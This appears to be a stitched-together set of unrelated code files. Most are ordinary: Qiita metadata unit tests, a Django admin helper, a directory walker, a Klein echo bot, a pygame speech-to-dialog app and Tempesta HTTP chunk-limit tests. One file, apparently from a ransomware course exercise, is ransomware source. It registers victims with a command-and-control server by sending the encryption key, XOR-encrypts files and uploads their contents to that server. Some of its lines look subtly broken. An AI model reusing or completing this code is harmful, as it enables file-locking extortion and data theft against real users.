'emp_status': 'EMP',\n 'new_col': 'val1'},\n '1.SKB8.640193': {\n 'barcode': 'GTCCGCAAGTTA',\n 'ebi_submission_accession': None,\n 'experiment_design_description': 'BBBB',\n 'library_construction_protocol': 'AAAA',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'run_prefix': 's_G1_L001_sequences',\n 'str_column': 'Value for sample 1',\n 'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'emp_status': 'EMP',\n 'new_col': 'val2'},\n '1.SKD8.640184': {\n 'barcode': 'CGTAGAGCTCTC',\n 'ebi_submission_accession': None,\n 'experiment_design_description': 'BBBB',\n 'library_construction_protocol': 'AAAA',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'run_prefix': 's_G1_L001_sequences',\n 'str_column': 'Value for sample 2',\n 'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'emp_status': 'EMP',\n 'new_col': 'val3'}}\n self.assertCountEqual(obs, exp)\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_extend_update(self):\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n self.metadata['new_col'] = pd.Series(['val1', 'val2', 'val3'],\n index=self.metadata.index)\n self.metadata['str_column']['SKB7.640196'] = 'NEW VAL'\n\n npt.assert_warns(\n qdb.exceptions.QiitaDBWarning, pt.extend_and_update, self.metadata)\n\n with qdb.sql_connection.TRN:\n sql = \"\"\"SELECT *\n FROM qiita.prep_{0}\n WHERE sample_id != '{1}'\"\"\".format(pt.id, self.QCN)\n qdb.sql_connection.TRN.add(sql)\n obs = dict(qdb.sql_connection.TRN.execute_fetchindex())\n exp = {'1.SKB7.640196': {\n 'barcode': 'CCTCTGAGAGCT',\n 'ebi_submission_accession': None,\n 'experiment_design_description': 'BBBB',\n 'library_construction_protocol': 'AAAA',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'run_prefix': 's_G1_L002_sequences',\n 'str_column': 'NEW VAL',\n 'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'emp_status': 'EMP',\n 'new_col': 'val1'},\n '1.SKB8.640193': {\n 'barcode': 'GTCCGCAAGTTA',\n 'ebi_submission_accession': None,\n 'experiment_design_description': 'BBBB',\n 'library_construction_protocol': 'AAAA',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'run_prefix': 's_G1_L001_sequences',\n 'str_column': 'Value for sample 1',\n 'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'emp_status': 'EMP',\n 'new_col': 'val2'},\n '1.SKD8.640184': {\n 'barcode': 'CGTAGAGCTCTC',\n 'ebi_submission_accession': None,\n 'experiment_design_description': 'BBBB',\n 'library_construction_protocol': 'AAAA',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'run_prefix': 's_G1_L001_sequences',\n 'str_column': 'Value for sample 2',\n 'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'emp_status': 'EMP',\n 'new_col': 'val3'}}\n\n self.assertCountEqual(obs, exp)\n\n def test_ebi_experiment_accessions(self):\n obs = self.tester.ebi_experiment_accessions\n exp = {'1.SKB8.640193': 'ERX0000000',\n '1.SKD8.640184': 'ERX0000001',\n '1.SKB7.640196': 'ERX0000002',\n '1.SKM9.640192': 'ERX0000003',\n '1.SKM4.640180': 'ERX0000004',\n '1.SKM5.640177': 'ERX0000005',\n '1.SKB5.640181': 'ERX0000006',\n '1.SKD6.640190': 'ERX0000007',\n '1.SKB2.640194': 'ERX0000008',\n '1.SKD2.640178': 'ERX0000009',\n '1.SKM7.640188': 
'ERX0000010',\n '1.SKB1.640202': 'ERX0000011',\n '1.SKD1.640179': 'ERX0000012',\n '1.SKD3.640198': 'ERX0000013',\n '1.SKM8.640201': 'ERX0000014',\n '1.SKM2.640199': 'ERX0000015',\n '1.SKB9.640200': 'ERX0000016',\n '1.SKD5.640186': 'ERX0000017',\n '1.SKM3.640197': 'ERX0000018',\n '1.SKD9.640182': 'ERX0000019',\n '1.SKB4.640189': 'ERX0000020',\n '1.SKD7.640191': 'ERX0000021',\n '1.SKM6.640187': 'ERX0000022',\n '1.SKD4.640185': 'ERX0000023',\n '1.SKB3.640195': 'ERX0000024',\n '1.SKB6.640176': 'ERX0000025',\n '1.SKM1.640183': 'ERX0000026'}\n self.assertEqual(obs, exp)\n\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study,\n self.data_type)\n obs = pt.ebi_experiment_accessions\n exp = {'%s.SKB8.640193' % self.test_study.id: None,\n '%s.SKD8.640184' % self.test_study.id: None,\n '%s.SKB7.640196' % self.test_study.id: None}\n self.assertEqual(obs, exp)\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_ebi_experiment_accessions_setter(self):\n with self.assertRaises(qdb.exceptions.QiitaDBError):\n self.tester.ebi_experiment_accessions = {\n '1.SKB8.640193': 'ERX1000000', '1.SKD8.640184': 'ERX1000001'}\n\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n exp_acc = {'%s.SKB8.640193' % self.test_study.id: 'ERX0000126',\n '%s.SKD8.640184' % self.test_study.id: 'ERX0000127'}\n pt.ebi_experiment_accessions = exp_acc\n exp_acc['%s.SKB7.640196' % self.test_study.id] = None\n self.assertEqual(pt.ebi_experiment_accessions, exp_acc)\n exp_acc['%s.SKB7.640196' % self.test_study.id] = 'ERX0000128'\n pt.ebi_experiment_accessions = exp_acc\n self.assertEqual(pt.ebi_experiment_accessions, exp_acc)\n\n # We need to wrap the assignment in a function so we can use\n # npt.assert_warns\n def f():\n pt.ebi_experiment_accessions = exp_acc\n npt.assert_warns(qdb.exceptions.QiitaDBWarning, f)\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_ebi_experiment_accessions_setter_common_samples(self):\n # If 2 different prep templates have common samples, setting the\n # ebi_experiment_accession should affect only the prep template\n # that it was called to, not both prep templates\n pt1 = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n pt2 = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n exp_acc1 = {'%s.SKB8.640193' % self.test_study.id: 'ERX0000126',\n '%s.SKD8.640184' % self.test_study.id: 'ERX0000127'}\n pt1.ebi_experiment_accessions = exp_acc1\n exp_acc1['%s.SKB7.640196' % self.test_study.id] = None\n self.assertEqual(pt1.ebi_experiment_accessions, exp_acc1)\n exp_acc2 = {k: None for k in exp_acc1.keys()}\n self.assertEqual(pt2.ebi_experiment_accessions, exp_acc2)\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt1.id)\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt2.id)\n\n def test_is_submitted_to_ebi(self):\n self.assertTrue(self.tester.is_submitted_to_ebi)\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n self.assertFalse(pt.is_submitted_to_ebi)\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_validate_template_warning_missing(self):\n \"\"\"Raises an error if the template is missing a required column\"\"\"\n metadata_dict = {\n 'SKB8.640193': {'center_name': 'ANL',\n 
'center_project_name': 'Test Project',\n 'ebi_submission_accession': None,\n 'linkerprimersequence': 'GTGCCAGCMGCCGCGGTAA',\n 'barcodesequence': 'GTCCGCAAGTTA',\n 'run_prefix': \"s_G1_L001_sequences\",\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'library_construction_protocol': 'AAAA',\n 'experiment_design_description': 'BBBB'}\n }\n metadata = pd.DataFrame.from_dict(metadata_dict, orient='index',\n dtype=str)\n PT = qdb.metadata_template.prep_template.PrepTemplate\n obs = PT._clean_validate_template(metadata, 2)\n\n metadata_dict = {\n '2.SKB8.640193': {'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'ebi_submission_accession': None,\n 'linkerprimersequence': 'GTGCCAGCMGCCGCGGTAA',\n 'barcodesequence': 'GTCCGCAAGTTA',\n 'run_prefix': \"s_G1_L001_sequences\",\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'library_construction_protocol': 'AAAA',\n 'experiment_design_description': 'BBBB'}\n }\n exp = pd.DataFrame.from_dict(metadata_dict, orient='index',\n dtype=str)\n obs.sort_index(axis=0, inplace=True)\n obs.sort_index(axis=1, inplace=True)\n exp.sort_index(axis=0, inplace=True)\n exp.sort_index(axis=1, inplace=True)\n assert_frame_equal(obs, exp, check_like=True)\n\n def test_delete_column(self):\n QE = qdb.exceptions\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n pt.delete_column('str_column')\n self.assertNotIn('str_column', pt.categories)\n\n # testing errors\n pt = qdb.metadata_template.prep_template.PrepTemplate(1)\n with self.assertRaises(QE.QiitaDBOperationNotPermittedError):\n pt.delete_column('barcode')\n with self.assertRaises(QE.QiitaDBColumnError):\n pt.delete_column('ph')\n\n def test_delete_samples(self):\n QE = qdb.exceptions\n sid = self.test_study.id\n\n ptA = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n ptB = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n\n # first let's test that we cannot delete all samples from one of the\n # preps\n with self.assertRaisesRegex(ValueError, \"You cannot delete all \"\n \"samples from an information file\"):\n ptA.delete_samples(list(ptA.keys()))\n\n # then continue with the regular testing\n sample1 = '%s.SKB8.640193' % sid\n sample2 = '%s.SKD8.640184' % sid\n sample3 = '%s.SKB7.640196' % sid\n ptA.delete_samples([sample1])\n self.assertNotIn(sample1, ptA)\n self.assertIn(sample2, ptA)\n self.assertIn(sample3, ptA)\n ptB.delete_samples([sample2, sample3])\n self.assertIn(sample1, ptB)\n self.assertNotIn(sample2, ptB)\n self.assertNotIn(sample3, ptB)\n\n pt = qdb.metadata_template.prep_template.PrepTemplate(1)\n self.assertIn(sample1, pt)\n\n # testing errors\n with self.assertRaises(QE.QiitaDBUnknownIDError):\n ptA.delete_samples(['not.existing.sample'])\n\n pt = qdb.metadata_template.prep_template.PrepTemplate(2)\n with self.assertRaises(QE.QiitaDBOperationNotPermittedError):\n pt.delete_samples(['1.SKM5.640177'])\n\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(ptA.id)\n qdb.metadata_template.prep_template.PrepTemplate.delete(ptB.id)\n\n def test_name_setter(self):\n pt = qdb.metadata_template.prep_template.PrepTemplate(1)\n self.assertEqual(pt.name, 'Prep information 1')\n pt.name = 'New Name'\n self.assertEqual(pt.name, 'New Name')\n pt.name = 'Prep information 1'\n self.assertEqual(pt.name, 'Prep information 1')\n\n\nEXP_PREP_TEMPLATE = (\n 
'sample_name\\tbarcode\\tcenter_name\\tcenter_project_name\\t'\n 'ebi_submission_accession\\temp_status\\texperiment_design_description\\t'\n 'insdc_nulls\\tinstrument_model\\tlibrary_construction_protocol\\tplatform\\t'\n 'primer\\tqiita_prep_id\\trun_prefix\\tstr_column\\n'\n '1.SKB7.640196\\tCCTCTGAGAGCT\\tANL\\tTest Project\\t\\tEMP\\tBBBB\\t'\n 'not applicable\\tIllumina MiSeq\\tAAAA\\tIllumina\\tGTGCCAGCMGCCGCGGTAA\\t'\n '{0}\\ts_G1_L002_sequences\\tValue for sample 3\\n'\n '1.SKB8.640193\\tGTCCGCAAGTTA\\tANL\\tTest Project\\t\\tEMP\\tBBBB\\t'\n '3.6\\tIllumina MiSeq\\tAAAA\\tIllumina\\tGTGCCAGCMGCCGCGGTAA\\t'\n '{0}\\ts_G1_L001_sequences\\tValue for sample 1\\n'\n '1.SKD8.640184\\tCGTAGAGCTCTC\\tANL\\tTest Project\\t\\tEMP\\tBBBB\\t'\n 'not applicable\\tIllumina MiSeq\\tAAAA\\tIllumina\\tGTGCCAGCMGCCGCGGTAA\\t'\n '{0}\\ts_G1_L001_sequences\\tValue for sample 2\\n')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"qiita-spots/qiita","sub_path":"qiita_db/metadata_template/test/test_prep_template.py","file_name":"test_prep_template.py","file_ext":"py","file_size_in_byte":90439,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"78"} +{"seq_id":"11773015698","text":"from hashlib import sha256\r\nimport logging\r\nimport os\r\nimport secrets\r\nfrom typing import List, Tuple\r\nimport os.path\r\nimport requests\r\nimport base64\r\n\r\nfrom cryptography.hazmat.primitives import hashes\r\nfrom cryptography.hazmat.primitives.KDF.pbkdf2 import PBKDF2HMAC\r\n\r\nfrom xorcrypt import xorfile\r\n\r\nclass SecretManager:\r\n ITERATION = 48000 # Number of iteration for the key derivation function\r\n TOKEN_LENGTH = 16 # Length of the token\r\n SALT_LENGTH = 16 # Length of the salt\r\n KEY_LENGTH = 16 # Length of the key\r\n\r\n def __init__(self, remote_host_port:str=\"127.0.0.1:6666\", path:str=\"/root\") -> None: \r\n self._remote_host_port = remote_host_port\r\n self._path = path # path to the malware\r\n self._key = None # key to decrypt files\r\n self._salt = None # salt to derive key\r\n self._token = None # token to identify the malware\r\n\r\n self._log = logging.getLogger(self.__class__.__name__) # logger\r\n\r\n\r\n def do_derivation(self, salt:bytes, key:bytes)->bytes: \r\n # derive key from salt and key\r\n KDF = PBKDF2HMAC(\r\n algorithm=hashes.SHA256(),\r\n length=self.KEY_LENGTH,\r\n salt=salt,\r\n iterations=self.ITERATION,\r\n )\r\n return KDF.derive(key)\r\n\r\n def create(self)->Tuple[bytes, bytes, bytes]: # create crypto DATA\r\n SALT = secrets.token_bytes(self.SALT_LENGTH)\r\n KEY = secrets.token_bytes(self.KEY_LENGTH)\r\n TOKEN = secrets.token_bytes(self.TOKEN_LENGTH)\r\n return SALT, KEY, TOKEN\r\n\r\n\r\n def bin_to_b64(self, DATA:bytes)->str: # convert binary DATA to base64\r\n TMP = base64.b64encode(DATA)\r\n return str(TMP, \"utf8\")\r\n\r\n\r\n def post_new(self, salt:bytes, key:bytes, token:bytes)->None:\r\n # register the victim to the CNC\r\n URL = f\"http://{self._remote_host_port}/new\"\r\n DATA = {\r\n \"salt\": self.bin_to_b64(salt),\r\n \"key\": self.bin_to_b64(key),\r\n \"token\": self.bin_to_b64(token),\r\n }\r\n self._log.info(f\"POST {URL} {DATA}\")\r\n R = requests.post(URL, DATA=DATA)\r\n self._log.info(f\"POST {URL} {DATA} {R.status_code}\")\r\n if R.status_code != 200:\r\n raise Exception(\"Error while registering to the CNC\")\r\n\r\n def setup(self)->None: # main function to create crypto DATA and register malware to cnc\r\n SALT, KEY, TOKEN = self.create() # create crypto DATA\r\n 
self.post_new(SALT, KEY, TOKEN) # register to the CNC\r\n self._salt = SALT # set the salt\r\n self._key = KEY# set the key\r\n self._token = TOKEN # set the token\r\n # save token in token.bin if not already present\r\n if not os.path.exists(os.path.join(self._path, \"token.bin\")): # if token.bin not present\r\n with open(os.path.join(self._path, \"token.bin\"),\r\n \"wb\") as f:\r\n f.write(TOKEN)\r\n with open(os.path.join(self._path, \"salt.bin\"), \"wb\") as f:\r\n f.write(SALT)\r\n self._log.info(\"Setup done\") # log\r\n\r\n\r\n def load(self)->None:\r\n # function to load crypto DATA from the target\r\n with open(os.path.join(self._path, \"salt.bin\"), \"rb\") as f:\r\n self._salt = f.read()\r\n with open(os.path.join(self._path, \"token.bin\"), \"rb\") as f:\r\n self._token = f.read()\r\n \r\n\r\n def check_key(self, candidate_key:bytes)->bool:\r\n # check if the candidate key is valid \r\n URL = f\"http://{self._remote_host_port}/check\" # URL to check the key\r\n DATA = {\r\n \"token\": self.bin_to_b64(self._token),\r\n \"key\": self.bin_to_b64(candidate_key)\r\n }\r\n self._log.info(f\"POST {URL} {DATA}\") # log the request\r\n R = requests.post(URL, DATA=DATA)\r\n self._log.info(f\"POST {URL} {DATA} {R.status_code}\") # log the response\r\n if R.status_code != 200:\r\n return False\r\n return True\r\n\r\n\r\n def set_key(self, b64_key:str)->None:\r\n # If the key is valid, set the self._key var for decrypting\r\n KEY = base64.b64decode(b64_key)\r\n if self.check_key( KEY):\r\n self._key = KEY\r\n self._log.info(\"Key set\")\r\n else:\r\n raise Exception(\"Invalid key\")\r\n\r\n\r\n def get_hex_token(self)->str:\r\n # Return a string composed of hex symbole, regarding the token\r\n with open (os.path.join(self._path, \"token.bin\"), \"rb\") as f:\r\n TOKEN = f.read()\r\n return str(TOKEN.hex())\r\n\r\n\r\n def xorfiles(self, files:List[str])->None:\r\n # xor a list for file\r\n for f in files:\r\n xorfile(os.path.join(self._path, f), self._key)\r\n \r\n \r\n\r\n def leak_files(self, files:List[str])->None:\r\n # send file, geniune path and token to the CNC\r\n for f in files:\r\n with open(os.path.join (self._path, f), \"rb\") as f:\r\n DATA = f.read()\r\n URL = f\"http://{self._remote_host_port}/leak\"\r\n DATA = {\r\n \"token\": self.bin_to_b64(self._token),\r\n \"DATA\": self.bin_to_b64(DATA),\r\n \"filename\": f\r\n }\r\n self._log.info(f\"POST {URL} {DATA}\")\r\n R = requests.post(URL, DATA=DATA)\r\n self._log.info(f\"POST {URL} {DATA} {R.status_code}\")\r\n if R.status_code != 200:\r\n raise Exception(\"Error while sending file to the CNC\")\r\n\r\n def clean(self):# Mr propre\r\n # remove crypto DATA from the target\r\n os.remove(os.path.join(self._path, \"salt.bin\"))\r\n os.remove(os.path.join(self._path, \"token.bin\"))\r\n\r\n \r\n\r\n \r\n\r\n \r\n","repo_name":"Obsterpouspug/TD_ransomware_IKA","sub_path":"TD-ransomware-IK/sources/secret_manager.py","file_name":"secret_manager.py","file_ext":"py","file_size_in_byte":5657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26023984652","text":"#-*- coding:utf-8 -*-\n\nfrom functools import wraps\ndef rename_app_list(func):\n m = {'Sites':'Web sites',\n 'Auth':'帐号管理',\n 'Cafe_Search':'数据库',\n }\n\n @wraps(func)\n def _wrapper(*args, **kwargs):\n response = func(*args, **kwargs)\n app_list = response.context_data.get('app_list')\n\n if app_list is not None:\n for a in app_list:\n name = a['name']\n a['name'] = m.get(name, name)\n title = 
response.context_data.get('title')\n\n if title is not None:\n app_label = title.split(' ')[0]\n if app_label in m:\n response.context_data['title'] = \"%s管理\" % m[app_label]\n return response\n return _wrapper\n","repo_name":"dtbinh/test","sub_path":"Cafe/Cafe_search/appVerbosename.py","file_name":"appVerbosename.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14433700075","text":"import os\ndef getAllDirRE(path, sp = ''):\n sp += '---'\n # 得到当前目录下所有文件\n filesList = os.listdir(path)\n # 处理每一个文件\n for fileName in filesList:\n # path\\fileName (用绝对路径)\n if os.path.isdir(os.path.join(path, fileName)):\n print(sp + '目录', fileName)\n getAllDirRE(os.path.join(path, fileName),sp)\n else:\n print(sp + '普通文件', fileName)\n\ngetAllDirRE(r'D:\\pythontext')\n","repo_name":"qscf1234/pythontext","sub_path":"day09/3-目录遍历/1、递归遍历目录.py","file_name":"1、递归遍历目录.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22152845998","text":"import json\nfrom klein import run, route\nfrom twisted.python import log\n\n\n@route('/')\ndef echo(request):\n request.setHeader('Content-Type', 'application/json')\n message = json.load(request.content)\n log.msg('Received: %r' % (message,))\n\n if not message.get('type') == 'message':\n return json.dumps([])\n\n return json.dumps([{\n 'text': 'You said: %s' % (message['text'],),\n 'type': 'message',\n 'channel': message['channel'],\n }])\n\n\nrun(\"localhost\", 8000)\n","repo_name":"praekeltfoundation/heatherrd","sub_path":"echo.py","file_name":"echo.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"32896840635","text":"from pygame import mixer\nimport speech_recognition as sr\nimport pyaudio\nimport pygame\nimport time\nimport keyboard\npygame.init()\n\nx = 1334\ny = 376\nz = \"* hotkeys are CTRL+1-6 to change portrait icons\"\nlinebreak = 0\nn = \"* \"\nb = \"\"\na = \"\"\nk = \"\"\nchange = \"\"\nportraitImage = 1\nzstring = \"\"\nbstring = \"\"\nastring = \"\"\ncounter = \"\"\noneusevariable = 1\n\npygame.display.set_mode((x,y))\n\nscrn = pygame.display.set_mode((x, y))\n\nportrait = pygame.image.load(\"ralsei_idle.png\").convert()\nportrait = pygame.transform.scale(portrait, (262, 220))\nscrn.blit(portrait, (91, 85))\n\ndialog = pygame.image.load(\"dialog.png\").convert()\nscrn.blit(dialog, (0, 0))\n\nfont_1 = pygame.font.Font(\"determinationMono.ttf\", 59)\n\npygame.display.set_caption('speech to deltarune')\npygame_icon = pygame.image.load('deltarune.png')\npygame.display.set_icon(pygame_icon)\n \nmic = pyaudio.PyAudio()\nstream = mic.open(format=pyaudio.paInt16, channels=1, rate=16000, input=True, frames_per_buffer=8192)\nstream.start_stream()\n \nmixer.init()\nmixer.music.load(\"ralsei_snd.wav\")\nmixer.music.set_volume(0.7)\n\n\ng = 0 \nr=sr.Recognizer()\nwith sr.Microphone() as source:\n r.adjust_for_ambient_noise(source,duration=1)\n\npygame.display.flip()\nrunning = True\nwhile running:\n \n if g == 3:\n with sr.Microphone() as source:\n print(\"say anything : \")\n audio= r.listen(source)\n try:\n z = r.recognize_google(audio)\n z = \"* \" + z\n except:\n z = \"* could not recognize \"\n\n\n def print_string(sentence):\n count = 0\n #sentence = str(sentence)\n while count < len(sentence):\n global k\n k = k + sentence[count]\n o = k\n text = 
font_1.render(o, False, (255, 255, 255))\n if dialogs == 1:\n scrn.blit(text, (337,64))\n if dialogs == 2:\n scrn.blit(text, (407,144))\n if dialogs == 3:\n scrn.blit(text, (407,224))\n print(k)\n pygame.display.update()\n mixer.music.play()\n count += 1\n time.sleep(0.04)\n k = \"\"\n o = \"\"\n \n\n #optimized code hours right here\n if keyboard.is_pressed(\"ctrl+1\"):\n portraitImage = 1\n print(\"1\")\n elif keyboard.is_pressed(\"ctrl+2\"):\n portraitImage = 2\n print(\"2\")\n elif keyboard.is_pressed(\"ctrl+3\"):\n portraitImage = 3\n print(\"3\")\n elif keyboard.is_pressed(\"ctrl+4\"):\n portraitImage = 4\n print(\"4\")\n elif keyboard.is_pressed(\"ctrl+5\"):\n portraitImage = 5\n print(\"5\")\n elif keyboard.is_pressed(\"ctrl+6\"):\n portraitImage = 6\n print(\"6\")\n\n if portraitImage == 1:\n portrait = pygame.image.load(\"ralsei_idle.png\").convert()\n portrait = pygame.transform.scale(portrait, (262, 220))\n elif portraitImage == 2:\n portrait = pygame.image.load(\"ralsei_happy.png\").convert()\n portrait = pygame.transform.scale(portrait, (262, 220))\n elif portraitImage == 3:\n portrait = pygame.image.load(\"ralsei_blush.png\").convert()\n portrait = pygame.transform.scale(portrait, (262, 220))\n elif portraitImage == 4:\n portrait = pygame.image.load(\"ralsei_worry.png\").convert()\n portrait = pygame.transform.scale(portrait, (262, 220))\n elif portraitImage == 5:\n portrait = pygame.image.load(\"ralsei_what.png\").convert()\n portrait = pygame.transform.scale(portrait, (262, 220))\n elif portraitImage == 6:\n portrait = pygame.image.load(\"ralsei_smug.png\").convert()\n portrait = pygame.transform.scale(portrait, (262, 220))\n \n #sadly the end of optimized code hours\n\n scrn.blit(portrait, (74, 86))\n zlist = z.split()\n blist = list(b)\n alist = list(a)\n\n\n if not change == z and not z == \"* huh\":\n scrn.blit(dialog, (0, 0))\n scrn.blit(portrait, (74, 86))\n for i in range(1, len(z.split())):\n zlist.insert(i + (i - 1), \" \")\n for i in range(len(zlist)):\n counter = counter + zlist[i]\n if len(counter) >= 25 and not len(counter) >= 50:\n blist.append(zlist[i])\n if len(counter) >= 50 and not len(counter) >= 75:\n alist.append(zlist[i])\n counter = \"\"\n for i in range(len(zlist)):\n if not len(counter) >=25:\n counter = counter + zlist[i]\n if len(counter) >= 25:\n if i < len(zlist):\n del zlist[i]\n counter = \"\"\n\n\n\n for i in range(len(zlist)):\n zstring = zstring + zlist[i]\n for i in range(len(blist)):\n bstring = bstring + blist[i]\n for i in range(len(alist)):\n astring = astring + alist[i]\n\n change = z\n dialogs = 1\n print_string(zstring)\n dialogs = 2\n print_string(bstring)\n dialogs = 3\n print_string(astring)\n change = z\n zstring = \"\"\n bstring = \"\"\n astring = \"\"\n\n print(zstring)\n print(bstring)\n print(astring)\n time.sleep(1)\n counter = \"\"\n\n \n\n k = \"\"\n\n\n if g == 2:\n g = 3\n if g == 1:\n z = \"* have fun!\"\n g = 2\n if g == 0:\n z = \"* remember to hold them down or else they wont go through\"\n g = 1\n \n\n\n\n\n\n for event in pygame.event.get(): \n if event.type == pygame.QUIT: \n running = False","repo_name":"gamrtiem/deltarune-dialog-speech-to-text","sub_path":"main/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5484,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"9668946120","text":"\"\"\"Functional tests for `http_header_chunk_cnt` and `http_body_chunk_cnt` directive\"\"\"\n\n__author__ = \"Tempesta Technologies, 
Inc.\"\n__copyright__ = \"Copyright (C) 2022-2023 Tempesta Technologies, Inc.\"\n__license__ = \"GPL2\"\n\nfrom t_frang.frang_test_case import FrangTestCase, H2Config\n\nCLIENT = {\n \"id\": \"deproxy-1\",\n \"type\": \"deproxy\",\n \"addr\": \"${tempesta_ip}\",\n \"port\": \"80\",\n \"segment_gap\": 100, # ms\n}\n\n\nclass HttpHeaderChunkCnt(FrangTestCase):\n error = \"Warning: frang: HTTP header chunk count exceeded\"\n clients = [CLIENT]\n\n requests = [\n \"POST / HTTP/1.1\\r\\n\",\n \"Host: localhost\\r\\n\",\n \"Content-type: text/plain\\r\\n\" \"Content-Length: 0\\r\\n\\r\\n\",\n ]\n\n def test_header_chunk_cnt_ok(self):\n \"\"\"Set up `http_header_chunk_cnt 3;` and make request with 3 header chunk\"\"\"\n client = self.base_scenario(\n frang_config=\"http_header_chunk_cnt 3;\",\n requests=self.requests,\n disable_hshc=True,\n )\n self.check_response(client, \"200\", self.error)\n\n def test_header_chunk_cnt_ok_2(self):\n \"\"\"Set up `http_header_chunk_cnt 5;` and make request with 3 header chunk\"\"\"\n client = self.base_scenario(\n frang_config=\"http_header_chunk_cnt 5;\",\n requests=self.requests,\n disable_hshc=True,\n )\n self.check_response(client, \"200\", self.error)\n\n def test_header_chunk_cnt_invalid(self):\n \"\"\"Set up `http_header_chunk_cnt 2;` and make request with 3 header chunk\"\"\"\n client = self.base_scenario(\n frang_config=\"http_header_chunk_cnt 2;\", requests=self.requests, disable_hshc=True\n )\n self.check_response(client, \"403\", self.error)\n\n\nclass HttpBodyChunkCnt(FrangTestCase):\n error = \"Warning: frang: HTTP body chunk count exceeded\"\n clients = [CLIENT]\n\n requests = [\n \"POST / HTTP/1.1\\r\\nHost: debian\\r\\nContent-type: text/plain\\r\\nContent-Length: 4\\r\\n\\r\\n\",\n \"1\",\n \"2\",\n \"3\",\n \"4\",\n ]\n\n def test_body_chunk_cnt_ok(self):\n \"\"\"Set up `http_body_chunk_cnt 4;` and make request with 4 body chunk\"\"\"\n client = self.base_scenario(frang_config=\"http_body_chunk_cnt 4;\", requests=self.requests)\n self.check_response(client, \"200\", self.error)\n\n def test_body_chunk_cnt_ok_2(self):\n \"\"\"Set up `http_body_chunk_cnt 10;` and make request with 4 body chunk\"\"\"\n client = self.base_scenario(frang_config=\"http_body_chunk_cnt 10;\", requests=self.requests)\n self.check_response(client, \"200\", self.error)\n\n def test_body_chunk_cnt_invalid(self):\n \"\"\"Set up `http_body_chunk_cnt 3;` and make request with 4 body chunk\"\"\"\n client = self.base_scenario(frang_config=\"http_body_chunk_cnt 3;\", requests=self.requests)\n self.check_response(client, \"403\", self.error)\n\n\nclass HttpHeaderChunkCntH2Base(H2Config, FrangTestCase, base=True):\n segment_size: int\n\n def base_scenario(self, frang_config: str, requests: list, disable_hshc: bool = False):\n self.set_frang_config(\n \"\\n\".join(\n [frang_config] + ([\"http_strict_host_checking false;\"] if disable_hshc else [])\n )\n )\n\n client = self.get_client(\"deproxy-1\")\n client.parsing = False\n client.start()\n\n client.update_initial_settings()\n client.send_bytes(client.h2_connection.data_to_send())\n client.wait_for_ack_settings()\n client.h2_connection.clear_outbound_data_buffer()\n\n client.segment_size = self.segment_size\n client.make_request(requests[0], huffman=False)\n client.wait_for_response(3)\n return client\n\n\nclass HttpHeaderChunkCntH2(HttpHeaderChunkCntH2Base, HttpHeaderChunkCnt):\n requests = [\n [\n (\":authority\", \"localhost\"),\n (\":path\", \"/\"),\n (\":scheme\", \"https\"),\n (\":method\", \"POST\"),\n (\"12345\", \"x\" * 
